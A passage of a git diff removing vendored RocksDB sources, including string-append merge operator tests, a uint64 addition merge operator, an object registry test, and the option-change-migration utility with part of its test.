-  std::unique_ptr<rocksdb::Iterator> it(db_->NewIterator(ReadOptions()));
-  std::string k1("k1");
-  std::string k2("k2");
-  bool first = true;
-  for (it->Seek(k1); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "v1,v2,v3");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "a1,a2,a3");
-    }
-  }
-  slists.Append("k2", "a4");
-  slists.Append("k1", "v4");
-
-  // Snapshot should still be the same. Should ignore a4 and v4.
-  first = true;
-  for (it->Seek(k1); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "v1,v2,v3");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "a1,a2,a3");
-    }
-  }
-
-
-  // Should release the snapshot and be aware of the new stuff now
-  it.reset(db_->NewIterator(ReadOptions()));
-  first = true;
-  for (it->Seek(k1); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "v1,v2,v3,v4");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "a1,a2,a3,a4");
-    }
-  }
-
-  // start from k2 this time.
-  for (it->Seek(k2); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "v1,v2,v3,v4");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "a1,a2,a3,a4");
-    }
-  }
-
-  slists.Append("k3", "g1");
-
-  it.reset(db_->NewIterator(ReadOptions()));
-  first = true;
-  std::string k3("k3");
-  for(it->Seek(k2); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      ASSERT_EQ(res, "a1,a2,a3,a4");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "g1");
-    }
-  }
-  for(it->Seek(k3); it->Valid(); it->Next()) {
-    res = it->value().ToString();
-    if (first) {
-      // should not be hit
-      ASSERT_EQ(res, "a1,a2,a3,a4");
-      first = false;
-    } else {
-      ASSERT_EQ(res, "g1");
-    }
-  }
-
-}
-
-TEST_F(StringAppendOperatorTest, SimpleTest) {
-  auto db = OpenDb(',');
-  StringLists slists(db);
-
-  slists.Append("k1", "v1");
-  slists.Append("k1", "v2");
-  slists.Append("k1", "v3");
-
-  std::string res;
-  bool status = slists.Get("k1", &res);
-
-  ASSERT_TRUE(status);
-  ASSERT_EQ(res, "v1,v2,v3");
-}
-
-TEST_F(StringAppendOperatorTest, SimpleDelimiterTest) {
-  auto db = OpenDb('|');
-  StringLists slists(db);
-
-  slists.Append("k1", "v1");
-  slists.Append("k1", "v2");
-  slists.Append("k1", "v3");
-
-  std::string res;
-  slists.Get("k1", &res);
-  ASSERT_EQ(res, "v1|v2|v3");
-}
-
-TEST_F(StringAppendOperatorTest, OneValueNoDelimiterTest) {
-  auto db = OpenDb('!');
-  StringLists slists(db);
-
-  slists.Append("random_key", "single_val");
-
-  std::string res;
-  slists.Get("random_key", &res);
-  ASSERT_EQ(res, "single_val");
-}
-
-TEST_F(StringAppendOperatorTest, VariousKeys) {
-  auto db = OpenDb('\n');
-  StringLists slists(db);
-
-  slists.Append("c", "asdasd");
-  slists.Append("a", "x");
-  slists.Append("b", "y");
-  slists.Append("a", "t");
-  slists.Append("a", "r");
-  slists.Append("b", "2");
-  slists.Append("c", "asdasd");
-
-  std::string a, b, c;
-  bool sa, sb, sc;
-  sa = slists.Get("a", &a);
-  sb = slists.Get("b", &b);
-  sc = slists.Get("c", &c);
-
-  ASSERT_TRUE(sa && sb && sc); // All three keys should have been found
-
-  ASSERT_EQ(a, "x\nt\nr");
-  ASSERT_EQ(b, "y\n2");
-  ASSERT_EQ(c, "asdasd\nasdasd");
-}
-
-// Generate semi random keys/words from a small distribution.
-TEST_F(StringAppendOperatorTest, RandomMixGetAppend) {
-  auto db = OpenDb(' ');
-  StringLists slists(db);
-
-  // Generate a list of random keys and values
-  const int kWordCount = 15;
-  std::string words[] = {"sdasd", "triejf", "fnjsdfn", "dfjisdfsf", "342839",
-                         "dsuha", "mabuais", "sadajsid", "jf9834hf", "2d9j89",
-                         "dj9823jd", "a", "dk02ed2dh", "$(jd4h984$(*", "mabz"};
-  const int kKeyCount = 6;
-  std::string keys[] = {"dhaiusdhu", "denidw", "daisda", "keykey", "muki",
-                        "shzassdianmd"};
-
-  // Will store a local copy of all data in order to verify correctness
-  std::map<std::string, std::string> parallel_copy;
-
-  // Generate a bunch of random queries (Append and Get)!
-  enum query_t  { APPEND_OP, GET_OP, NUM_OPS };
-  Random randomGen(1337);       //deterministic seed; always get same results!
-
-  const int kNumQueries = 30;
-  for (int q=0; q<kNumQueries; ++q) {
-    // Generate a random query (Append or Get) and random parameters
-    query_t query = (query_t)randomGen.Uniform((int)NUM_OPS);
-    std::string key = keys[randomGen.Uniform((int)kKeyCount)];
-    std::string word = words[randomGen.Uniform((int)kWordCount)];
-
-    // Apply the query and any checks.
-    if (query == APPEND_OP) {
-
-      // Apply the rocksdb test-harness Append defined above
-      slists.Append(key, word);  //apply the rocksdb append
-
-      // Apply the similar "Append" to the parallel copy
-      if (parallel_copy[key].size() > 0) {
-        parallel_copy[key] += " " + word;
-      } else {
-        parallel_copy[key] = word;
-      }
-
-    } else if (query == GET_OP) {
-      // Assumes that a non-existent key just returns <empty>
-      std::string res;
-      slists.Get(key, &res);
-      ASSERT_EQ(res, parallel_copy[key]);
-    }
-
-  }
-
-}
-
-TEST_F(StringAppendOperatorTest, BIGRandomMixGetAppend) {
-  auto db = OpenDb(' ');
-  StringLists slists(db);
-
-  // Generate a list of random keys and values
-  const int kWordCount = 15;
-  std::string words[] = {"sdasd", "triejf", "fnjsdfn", "dfjisdfsf", "342839",
-                         "dsuha", "mabuais", "sadajsid", "jf9834hf", "2d9j89",
-                         "dj9823jd", "a", "dk02ed2dh", "$(jd4h984$(*", "mabz"};
-  const int kKeyCount = 6;
-  std::string keys[] = {"dhaiusdhu", "denidw", "daisda", "keykey", "muki",
-                        "shzassdianmd"};
-
-  // Will store a local copy of all data in order to verify correctness
-  std::map<std::string, std::string> parallel_copy;
-
-  // Generate a bunch of random queries (Append and Get)!
-  enum query_t  { APPEND_OP, GET_OP, NUM_OPS };
-  Random randomGen(9138204);       // deterministic seed
-
-  const int kNumQueries = 1000;
-  for (int q=0; q<kNumQueries; ++q) {
-    // Generate a random query (Append or Get) and random parameters
-    query_t query = (query_t)randomGen.Uniform((int)NUM_OPS);
-    std::string key = keys[randomGen.Uniform((int)kKeyCount)];
-    std::string word = words[randomGen.Uniform((int)kWordCount)];
-
-    //Apply the query and any checks.
-    if (query == APPEND_OP) {
-
-      // Apply the rocksdb test-harness Append defined above
-      slists.Append(key, word);  //apply the rocksdb append
-
-      // Apply the similar "Append" to the parallel copy
-      if (parallel_copy[key].size() > 0) {
-        parallel_copy[key] += " " + word;
-      } else {
-        parallel_copy[key] = word;
-      }
-
-    } else if (query == GET_OP) {
-      // Assumes that a non-existent key just returns <empty>
-      std::string res;
-      slists.Get(key, &res);
-      ASSERT_EQ(res, parallel_copy[key]);
-    }
-
-  }
-
-}
-
-TEST_F(StringAppendOperatorTest, PersistentVariousKeys) {
-  // Perform the following operations in limited scope
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-
-    slists.Append("c", "asdasd");
-    slists.Append("a", "x");
-    slists.Append("b", "y");
-    slists.Append("a", "t");
-    slists.Append("a", "r");
-    slists.Append("b", "2");
-    slists.Append("c", "asdasd");
-
-    std::string a, b, c;
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-
-    ASSERT_EQ(a, "x\nt\nr");
-    ASSERT_EQ(b, "y\n2");
-    ASSERT_EQ(c, "asdasd\nasdasd");
-  }
-
-  // Reopen the database (the previous changes should persist / be remembered)
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-
-    slists.Append("c", "bbnagnagsx");
-    slists.Append("a", "sa");
-    slists.Append("b", "df");
-    slists.Append("a", "gh");
-    slists.Append("a", "jk");
-    slists.Append("b", "l;");
-    slists.Append("c", "rogosh");
-
-    // The previous changes should be on disk (L0)
-    // The most recent changes should be in memory (MemTable)
-    // Hence, this will test both Get() paths.
-    std::string a, b, c;
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-
-    ASSERT_EQ(a, "x\nt\nr\nsa\ngh\njk");
-    ASSERT_EQ(b, "y\n2\ndf\nl;");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx\nrogosh");
-  }
-
-  // Reopen the database (the previous changes should persist / be remembered)
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-
-    // All changes should be on disk. This will test VersionSet Get()
-    std::string a, b, c;
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-
-    ASSERT_EQ(a, "x\nt\nr\nsa\ngh\njk");
-    ASSERT_EQ(b, "y\n2\ndf\nl;");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx\nrogosh");
-  }
-}
-
-TEST_F(StringAppendOperatorTest, PersistentFlushAndCompaction) {
-  // Perform the following operations in limited scope
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-    std::string a, b, c;
-    bool success;
-
-    // Append, Flush, Get
-    slists.Append("c", "asdasd");
-    db->Flush(rocksdb::FlushOptions());
-    success = slists.Get("c", &c);
-    ASSERT_TRUE(success);
-    ASSERT_EQ(c, "asdasd");
-
-    // Append, Flush, Append, Get
-    slists.Append("a", "x");
-    slists.Append("b", "y");
-    db->Flush(rocksdb::FlushOptions());
-    slists.Append("a", "t");
-    slists.Append("a", "r");
-    slists.Append("b", "2");
-
-    success = slists.Get("a", &a);
-    assert(success == true);
-    ASSERT_EQ(a, "x\nt\nr");
-
-    success = slists.Get("b", &b);
-    assert(success == true);
-    ASSERT_EQ(b, "y\n2");
-
-    // Append, Get
-    success = slists.Append("c", "asdasd");
-    assert(success);
-    success = slists.Append("b", "monkey");
-    assert(success);
-
-    // I omit the "assert(success)" checks here.
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-
-    ASSERT_EQ(a, "x\nt\nr");
-    ASSERT_EQ(b, "y\n2\nmonkey");
-    ASSERT_EQ(c, "asdasd\nasdasd");
-  }
-
-  // Reopen the database (the previous changes should persist / be remembered)
-  {
-    auto db = OpenDb('\n');
-    StringLists slists(db);
-    std::string a, b, c;
-
-    // Get (Quick check for persistence of previous database)
-    slists.Get("a", &a);
-    ASSERT_EQ(a, "x\nt\nr");
-
-    //Append, Compact, Get
-    slists.Append("c", "bbnagnagsx");
-    slists.Append("a", "sa");
-    slists.Append("b", "df");
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-    ASSERT_EQ(a, "x\nt\nr\nsa");
-    ASSERT_EQ(b, "y\n2\nmonkey\ndf");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx");
-
-    // Append, Get
-    slists.Append("a", "gh");
-    slists.Append("a", "jk");
-    slists.Append("b", "l;");
-    slists.Append("c", "rogosh");
-    slists.Get("a", &a);
-    slists.Get("b", &b);
-    slists.Get("c", &c);
-    ASSERT_EQ(a, "x\nt\nr\nsa\ngh\njk");
-    ASSERT_EQ(b, "y\n2\nmonkey\ndf\nl;");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx\nrogosh");
-
-    // Compact, Get
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    ASSERT_EQ(a, "x\nt\nr\nsa\ngh\njk");
-    ASSERT_EQ(b, "y\n2\nmonkey\ndf\nl;");
-    ASSERT_EQ(c, "asdasd\nasdasd\nbbnagnagsx\nrogosh");
-
-    // Append, Flush, Compact, Get
-    slists.Append("b", "afcg");
-    db->Flush(rocksdb::FlushOptions());
-    db->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    slists.Get("b", &b);
-    ASSERT_EQ(b, "y\n2\nmonkey\ndf\nl;\nafcg");
-  }
-}
-
-TEST_F(StringAppendOperatorTest, SimpleTestNullDelimiter) {
-  auto db = OpenDb('\0');
-  StringLists slists(db);
-
-  slists.Append("k1", "v1");
-  slists.Append("k1", "v2");
-  slists.Append("k1", "v3");
-
-  std::string res;
-  bool status = slists.Get("k1", &res);
-  ASSERT_TRUE(status);
-
-  // Construct the desired string. Default constructor doesn't like '\0' chars.
-  std::string checker("v1,v2,v3");    // Verify that the string is right size.
-  checker[2] = '\0';                  // Use null delimiter instead of comma.
-  checker[5] = '\0';
-  assert(checker.size() == 8);        // Verify it is still the correct size
-
-  // Check that the rocksdb result string matches the desired string
-  assert(res.size() == checker.size());
-  ASSERT_EQ(res, checker);
-}
-
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  // Run with regular database
-  int result;
-  {
-    fprintf(stderr, "Running tests with regular db and operator.\n");
-    StringAppendOperatorTest::SetOpenDbFunction(&OpenNormalDb);
-    result = RUN_ALL_TESTS();
-  }
-
-#ifndef ROCKSDB_LITE  // TtlDb is not supported in Lite
-  // Run with TTL
-  {
-    fprintf(stderr, "Running tests with ttl db and generic operator.\n");
-    StringAppendOperatorTest::SetOpenDbFunction(&OpenTtlDb);
-    result |= RUN_ALL_TESTS();
-  }
-#endif  // !ROCKSDB_LITE
-
-  return result;
-}
diff --git a/thirdparty/rocksdb/utilities/merge_operators/uint64add.cc b/thirdparty/rocksdb/utilities/merge_operators/uint64add.cc
deleted file mode 100644
index d782173..0000000
--- a/thirdparty/rocksdb/utilities/merge_operators/uint64add.cc
+++ /dev/null
@@ -1,73 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/slice.h"
-#include "util/coding.h"
-#include "util/logging.h"
-#include "utilities/merge_operators.h"
-
-using namespace rocksdb;
-
-namespace { // anonymous namespace
-
-// A 'model' merge operator with uint64 addition semantics
-// Implemented as an AssociativeMergeOperator for simplicity and example.
-class UInt64AddOperator : public AssociativeMergeOperator {
- public:
-  virtual bool Merge(const Slice& key,
-                     const Slice* existing_value,
-                     const Slice& value,
-                     std::string* new_value,
-                     Logger* logger) const override {
-    uint64_t orig_value = 0;
-    if (existing_value){
-      orig_value = DecodeInteger(*existing_value, logger);
-    }
-    uint64_t operand = DecodeInteger(value, logger);
-
-    assert(new_value);
-    new_value->clear();
-    PutFixed64(new_value, orig_value + operand);
-
-    return true;  // Return true always since corruption will be treated as 0
-  }
-
-  virtual const char* Name() const override {
-    return "UInt64AddOperator";
-  }
-
- private:
-  // Takes the string and decodes it into a uint64_t
-  // On error, prints a message and returns 0
-  uint64_t DecodeInteger(const Slice& value, Logger* logger) const {
-    uint64_t result = 0;
-
-    if (value.size() == sizeof(uint64_t)) {
-      result = DecodeFixed64(value.data());
-    } else if (logger != nullptr) {
-      // If value is corrupted, treat it as 0
-      ROCKS_LOG_ERROR(logger, "uint64 value corruption, size: %" ROCKSDB_PRIszt
-                              " > %" ROCKSDB_PRIszt,
-                      value.size(), sizeof(uint64_t));
-    }
-
-    return result;
-  }
-
-};
-
-}
-
-namespace rocksdb {
-
-std::shared_ptr<MergeOperator> MergeOperators::CreateUInt64AddOperator() {
-  return std::make_shared<UInt64AddOperator>();
-}
-
-}
diff --git a/thirdparty/rocksdb/utilities/object_registry_test.cc b/thirdparty/rocksdb/utilities/object_registry_test.cc
deleted file mode 100644
index 40fb387..0000000
--- a/thirdparty/rocksdb/utilities/object_registry_test.cc
+++ /dev/null
@@ -1,72 +0,0 @@
-// Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/object_registry.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-class EnvRegistryTest : public testing::Test {
- public:
-  static int num_a, num_b;
-};
-
-int EnvRegistryTest::num_a = 0;
-int EnvRegistryTest::num_b = 0;
-
-static Registrar<Env> test_reg_a("a://.*", [](const std::string& uri,
-                                              std::unique_ptr<Env>* env_guard) {
-  ++EnvRegistryTest::num_a;
-  return Env::Default();
-});
-
-static Registrar<Env> test_reg_b("b://.*", [](const std::string& uri,
-                                              std::unique_ptr<Env>* env_guard) {
-  ++EnvRegistryTest::num_b;
-  // Env::Default() is a singleton so we can't grant ownership directly to the
-  // caller - we must wrap it first.
-  env_guard->reset(new EnvWrapper(Env::Default()));
-  return env_guard->get();
-});
-
-TEST_F(EnvRegistryTest, Basics) {
-  std::unique_ptr<Env> env_guard;
-  auto res = NewCustomObject<Env>("a://test", &env_guard);
-  ASSERT_NE(res, nullptr);
-  ASSERT_EQ(env_guard, nullptr);
-  ASSERT_EQ(1, num_a);
-  ASSERT_EQ(0, num_b);
-
-  res = NewCustomObject<Env>("b://test", &env_guard);
-  ASSERT_NE(res, nullptr);
-  ASSERT_NE(env_guard, nullptr);
-  ASSERT_EQ(1, num_a);
-  ASSERT_EQ(1, num_b);
-
-  res = NewCustomObject<Env>("c://test", &env_guard);
-  ASSERT_EQ(res, nullptr);
-  ASSERT_EQ(env_guard, nullptr);
-  ASSERT_EQ(1, num_a);
-  ASSERT_EQ(1, num_b);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else  // ROCKSDB_LITE
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as EnvRegistry is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration.cc b/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration.cc
deleted file mode 100644
index c9e7fbc..0000000
--- a/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration.cc
+++ /dev/null
@@ -1,165 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "rocksdb/utilities/option_change_migration.h"
-
-#ifndef ROCKSDB_LITE
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-namespace {
-// Return a version of Options `opts` that allow us to open/write into a DB
-// without triggering an automatic compaction or stalling. This is guaranteed
-// by disabling automatic compactions and using huge values for stalling
-// triggers.
-Options GetNoCompactionOptions(const Options& opts) {
-  Options ret_opts = opts;
-  ret_opts.disable_auto_compactions = true;
-  ret_opts.level0_slowdown_writes_trigger = 999999;
-  ret_opts.level0_stop_writes_trigger = 999999;
-  ret_opts.soft_pending_compaction_bytes_limit = 0;
-  ret_opts.hard_pending_compaction_bytes_limit = 0;
-  return ret_opts;
-}
-
-Status OpenDb(const Options& options, const std::string& dbname,
-              std::unique_ptr<DB>* db) {
-  db->reset();
-  DB* tmpdb;
-  Status s = DB::Open(options, dbname, &tmpdb);
-  if (s.ok()) {
-    db->reset(tmpdb);
-  }
-  return s;
-}
-
-Status CompactToLevel(const Options& options, const std::string& dbname,
-                      int dest_level, bool need_reopen) {
-  std::unique_ptr<DB> db;
-  Options no_compact_opts = GetNoCompactionOptions(options);
-  if (dest_level == 0) {
-    // L0 has strict sequenceID requirements to files to it. It's safer
-    // to only put one compacted file to there.
-    // This is only used for converting to universal compaction with
-    // only one level. In this case, compacting to one file is also
-    // optimal.
-    no_compact_opts.target_file_size_base = 999999999999999;
-    no_compact_opts.max_compaction_bytes = 999999999999999;
-  }
-  Status s = OpenDb(no_compact_opts, dbname, &db);
-  if (!s.ok()) {
-    return s;
-  }
-  CompactRangeOptions cro;
-  cro.change_level = true;
-  cro.target_level = dest_level;
-  if (dest_level == 0) {
-    cro.bottommost_level_compaction = BottommostLevelCompaction::kForce;
-  }
-  db->CompactRange(cro, nullptr, nullptr);
-
-  if (need_reopen) {
-    // Need to restart DB to rewrite the manifest file.
-    // In order to open a DB with specific num_levels, the manifest file should
-    // contain no record that mentiones any level beyond num_levels. Issuing a
-    // full compaction will move all the data to a level not exceeding
-    // num_levels, but the manifest may still contain previous record mentioning
-    // a higher level. Reopening the DB will force the manifest to be rewritten
-    // so that those records will be cleared.
-    db.reset();
-    s = OpenDb(no_compact_opts, dbname, &db);
-  }
-  return s;
-}
-
-Status MigrateToUniversal(std::string dbname, const Options& old_opts,
-                          const Options& new_opts) {
-  if (old_opts.num_levels <= new_opts.num_levels ||
-      old_opts.compaction_style == CompactionStyle::kCompactionStyleFIFO) {
-    return Status::OK();
-  } else {
-    bool need_compact = false;
-    {
-      std::unique_ptr<DB> db;
-      Options opts = GetNoCompactionOptions(old_opts);
-      Status s = OpenDb(opts, dbname, &db);
-      if (!s.ok()) {
-        return s;
-      }
-      ColumnFamilyMetaData metadata;
-      db->GetColumnFamilyMetaData(&metadata);
-      if (!metadata.levels.empty() &&
-          metadata.levels.back().level >= new_opts.num_levels) {
-        need_compact = true;
-      }
-    }
-    if (need_compact) {
-      return CompactToLevel(old_opts, dbname, new_opts.num_levels - 1, true);
-    }
-    return Status::OK();
-  }
-}
-
-Status MigrateToLevelBase(std::string dbname, const Options& old_opts,
-                          const Options& new_opts) {
-  if (!new_opts.level_compaction_dynamic_level_bytes) {
-    if (old_opts.num_levels == 1) {
-      return Status::OK();
-    }
-    // Compact everything to level 1 to guarantee it can be safely opened.
-    Options opts = old_opts;
-    opts.target_file_size_base = new_opts.target_file_size_base;
-    // Although sometimes we can open the DB with the new option without error,
-    // We still want to compact the files to avoid the LSM tree to stuck
-    // in bad shape. For example, if the user changed the level size
-    // multiplier from 4 to 8, with the same data, we will have fewer
-    // levels. Unless we issue a full comaction, the LSM tree may stuck
-    // with more levels than needed and it won't recover automatically.
-    return CompactToLevel(opts, dbname, 1, true);
-  } else {
-    // Compact everything to the last level to guarantee it can be safely
-    // opened.
-    if (old_opts.num_levels == 1) {
-      return Status::OK();
-    } else if (new_opts.num_levels > old_opts.num_levels) {
-      // Dynamic level mode requires data to be put in the last level first.
-      return CompactToLevel(new_opts, dbname, new_opts.num_levels - 1, false);
-    } else {
-      Options opts = old_opts;
-      opts.target_file_size_base = new_opts.target_file_size_base;
-      return CompactToLevel(opts, dbname, new_opts.num_levels - 1, true);
-    }
-  }
-}
-}  // namespace
-
-Status OptionChangeMigration(std::string dbname, const Options& old_opts,
-                             const Options& new_opts) {
-  if (old_opts.compaction_style == CompactionStyle::kCompactionStyleFIFO) {
-    // LSM generated by FIFO compation can be opened by any compaction.
-    return Status::OK();
-  } else if (new_opts.compaction_style ==
-             CompactionStyle::kCompactionStyleUniversal) {
-    return MigrateToUniversal(dbname, old_opts, new_opts);
-  } else if (new_opts.compaction_style ==
-             CompactionStyle::kCompactionStyleLevel) {
-    return MigrateToLevelBase(dbname, old_opts, new_opts);
-  } else if (new_opts.compaction_style ==
-             CompactionStyle::kCompactionStyleFIFO) {
-    return CompactToLevel(old_opts, dbname, 0, true);
-  } else {
-    return Status::NotSupported(
-        "Do not how to migrate to this compaction style");
-  }
-}
-}  // namespace rocksdb
-#else
-namespace rocksdb {
-Status OptionChangeMigration(std::string dbname, const Options& old_opts,
-                             const Options& new_opts) {
-  return Status::NotSupported();
-}
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration_test.cc b/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration_test.cc
deleted file mode 100644
index 1f239b7..0000000
--- a/thirdparty/rocksdb/utilities/option_change_migration/option_change_migration_test.cc
+++ /dev/null
@@ -1,425 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/utilities/option_change_migration.h"
-#include <set>
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-namespace rocksdb {
-
-class DBOptionChangeMigrationTests
-    : public DBTestBase,
-      public testing::WithParamInterface<
-          std::tuple<int, int, bool, int, int, bool>> {
- public:
-  DBOptionChangeMigrationTests()
-      : DBTestBase("/db_option_change_migration_test") {
-    level1_ = std::get<0>(GetParam());
-    compaction_style1_ = std::get<1>(GetParam());
-    is_dynamic1_ = std::get<2>(GetParam());
-
-    level2_ = std::get<3>(GetParam());
-    compaction_style2_ = std::get<4>(GetParam());
-    is_dynamic2_ = std::get<5>(GetParam());
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  int level1_;
-  int compaction_style1_;
-  bool is_dynamic1_;
-
-  int level2_;
-  int compaction_style2_;
-  bool is_dynamic2_;
-};
-
-#ifndef ROCKSDB_LITE
-TEST_P(DBOptionChangeMigrationTests, Migrate1) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style1_);
-  if (old_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    old_options.level_compaction_dynamic_level_bytes = is_dynamic1_;
-  }
-
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = level1_;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // Generate at least 2MB of data
-  for (int num = 0; num < 20; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style2_);
-  if (new_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    new_options.level_compaction_dynamic_level_bytes = is_dynamic2_;
-  }
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = level2_;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
-    ASSERT_TRUE(!it->Valid());
-  }
-}
-
-TEST_P(DBOptionChangeMigrationTests, Migrate2) {
-  Options old_options = CurrentOptions();
-  old_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style2_);
-  if (old_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    old_options.level_compaction_dynamic_level_bytes = is_dynamic2_;
-  }
-  old_options.level0_file_num_compaction_trigger = 3;
-  old_options.write_buffer_size = 64 * 1024;
-  old_options.target_file_size_base = 128 * 1024;
-  // Make level target of L1, L2 to be 200KB and 600KB
-  old_options.num_levels = level2_;
-  old_options.max_bytes_for_level_multiplier = 3;
-  old_options.max_bytes_for_level_base = 200 * 1024;
-
-  Reopen(old_options);
-
-  Random rnd(301);
-  int key_idx = 0;
-
-  // Generate at least 2MB of data
-  for (int num = 0; num < 20; num++) {
-    GenerateNewFile(&rnd, &key_idx);
-  }
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-
-  // Will make sure exactly those keys are in the DB after migration.
-  std::set<std::string> keys;
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (; it->Valid(); it->Next()) {
-      keys.insert(it->key().ToString());
-    }
-  }
-
-  Close();
-
-  Options new_options = old_options;
-  new_options.compaction_style =
-      static_cast<CompactionStyle>(compaction_style1_);
-  if (new_options.compaction_style == CompactionStyle::kCompactionStyleLevel) {
-    new_options.level_compaction_dynamic_level_bytes = is_dynamic1_;
-  }
-  new_options.target_file_size_base = 256 * 1024;
-  new_options.num_levels = level1_;
-  new_options.max_bytes_for_level_base = 150 * 1024;
-  new_options.max_bytes_for_level_multiplier = 4;
-  ASSERT_OK(OptionChangeMigration(dbname_, old_options, new_options));
-  Reopen(new_options);
-  // Wait for compaction to finish and make sure it can reopen
-  dbfull()->TEST_WaitForFlushMemTable();
-  dbfull()->TEST_WaitForCompact();
-  Reopen(new_options);
-
-  {
-    std::unique_ptr<Iterator> it(db_->NewIterator(ReadOptions()));
-    it->SeekToFirst();
-    for (std::string key : keys) {
-      ASSERT_TRUE(it->Valid());
-      ASSERT_EQ(key, it->key().ToString());
-      it->Next();
-    }
